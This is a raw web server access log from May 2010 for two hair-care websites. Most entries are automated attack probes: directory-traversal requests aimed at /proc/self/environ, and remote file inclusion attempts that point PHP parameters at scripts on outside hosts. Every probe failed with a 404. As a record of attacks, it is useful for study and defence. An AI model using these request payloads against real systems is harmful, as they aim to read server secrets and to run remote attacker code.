77.88.25.28 - - [23/May/2010:20:23:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13983 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
82.103.136.15 - - [23/May/2010:20:24:18 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
82.103.136.15 - - [23/May/2010:20:24:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
82.103.136.15 - - [23/May/2010:20:24:19 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
67.195.114.22 - - [23/May/2010:20:31:04 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
67.195.114.22 - - [23/May/2010:20:31:05 -0700] "GET /?D=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.growlonghairfast.com"
77.88.25.28 - - [23/May/2010:20:31:48 -0700] "GET /logs/access_100426.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:20:35:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12143 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
114.108.151.149 - - [23/May/2010:20:38:16 -0700] "GET /logs///appserv/main.php?appserv_root=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [23/May/2010:20:38:16 -0700] "GET /logs/access_100125.log///appserv/main.php?appserv_root=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [23/May/2010:20:38:17 -0700] "GET //appserv/main.php?appserv_root=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [23/May/2010:20:38:17 -0700] "GET //appserv/main.php?appserv_root=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [23/May/2010:20:38:21 -0700] "GET /logs/access_100125.log///appserv/main.php?appserv_root=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
114.108.151.149 - - [23/May/2010:20:38:21 -0700] "GET /logs///appserv/main.php?appserv_root=http://bellschool.net/libraries/phpmailer/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [23/May/2010:20:38:52 -0700] "GET /logs/access_100125.log/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [23/May/2010:20:39:02 -0700] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.78.118.123 - - [23/May/2010:20:40:12 -0700] "GET /logs/access_100125.log/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.78.118.123 - - [23/May/2010:20:40:12 -0700] "GET /logs/access.log/delete_all.php?board_skin_path=http://www.sharon.or.kr/data/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [23/May/2010:20:51:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12614 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
94.247.177.18 - - [23/May/2010:20:57:32 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
79.174.72.200 - - [23/May/2010:20:59:29 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
94.247.177.18 - - [23/May/2010:21:01:55 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
79.174.72.200 - - [23/May/2010:21:04:09 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
94.247.177.18 - - [23/May/2010:21:09:21 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
94.247.177.18 - - [23/May/2010:21:09:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
94.247.177.18 - - [23/May/2010:21:09:21 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
79.174.72.200 - - [23/May/2010:21:11:39 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
79.174.72.200 - - [23/May/2010:21:11:39 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
79.174.72.200 - - [23/May/2010:21:11:40 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
94.247.177.18 - - [23/May/2010:21:12:51 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
94.247.177.18 - - [23/May/2010:21:12:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
94.247.177.18 - - [23/May/2010:21:12:51 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
77.88.25.28 - - [23/May/2010:21:13:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13835 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
79.174.72.200 - - [23/May/2010:21:15:26 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
79.174.72.200 - - [23/May/2010:21:15:26 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
79.174.72.200 - - [23/May/2010:21:15:26 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
188.40.137.140 - - [23/May/2010:21:31:18 -0700] "GET /logs/access.log/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:31:18 -0700] "GET /logs/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:31:18 -0700] "GET /errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:31:27 -0700] "GET /logs/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:31:27 -0700] "GET /logs/access.log/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:31:27 -0700] "GET /errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:31:31 -0700] "GET /errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:31:31 -0700] "GET /logs/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:31:31 -0700] "GET /logs/access.log/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:32:08 -0700] "GET /logs/access_100412.log%20%20/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:32:08 -0700] "GET /logs/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:32:08 -0700] "GET /errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:32:10 -0700] "GET /logs/access_100412.log%20%20/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:32:10 -0700] "GET /errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:32:10 -0700] "GET /logs/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:32:30 -0700] "GET /logs/access_100412.log%20%20/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:32:30 -0700] "GET /errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:32:30 -0700] "GET /logs/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:32:34 -0700] "GET /logs/access_100426.log%20%20/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:32:36 -0700] "GET /logs/access_100426.log%20%20/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:32:56 -0700] "GET /logs/access_100426.log%20%20/errors.php?error=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:21:33:03 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12270 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:41:45 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:41:45 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:41:45 -0700] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:41:51 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:41:51 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:41:51 -0700] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:41:52 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:41:52 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:41:52 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:41:54 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:41:54 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:41:54 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:43:20 -0700] "GET /logs/access_100201.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:43:20 -0700] "GET /logs/access_100201.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:43:27 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:43:27 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:43:27 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:43:27 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:43:27 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:43:27 -0700] "GET /logs/access.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
64.27.53.238 - - [23/May/2010:21:43:52 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:43:52 -0700] "GET /logs/access_100201.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:43:52 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:44:31 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:44:31 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:44:31 -0700] "GET /logs/access_100201.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.180.251 - - [23/May/2010:21:46:19 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "growlonghairfast.com"
188.40.180.251 - - [23/May/2010:21:50:27 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.freehairsecrets.com"
77.88.25.28 - - [23/May/2010:21:53:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=5300 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
220.181.94.213 - - [23/May/2010:21:54:04 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
220.181.94.213 - - [23/May/2010:21:55:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=8298 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:57:00 -0700] "GET /logs//modules/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:57:00 -0700] "GET /modules/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:57:00 -0700] "GET /logs/access_100412.log%20%20//modules/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:57:02 -0700] "GET /logs/access_100412.log%20%20//modules/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:57:02 -0700] "GET /logs//modules/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.27.53.238 - - [23/May/2010:21:57:02 -0700] "GET /modules/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:57:13 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:57:13 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:57:13 -0700] "GET /logs/access_100503.log%20%20//include/admin.lib.inc.php?site_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [23/May/2010:21:59:21 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13233 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:59:49 -0700] "GET /logs//include/admin.lib.inc.php?site_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:59:49 -0700] "GET /include/admin.lib.inc.php?site_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
188.40.137.140 - - [23/May/2010:21:59:49 -0700] "GET /logs/access_100503.log%20%20//include/admin.lib.inc.php?site_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
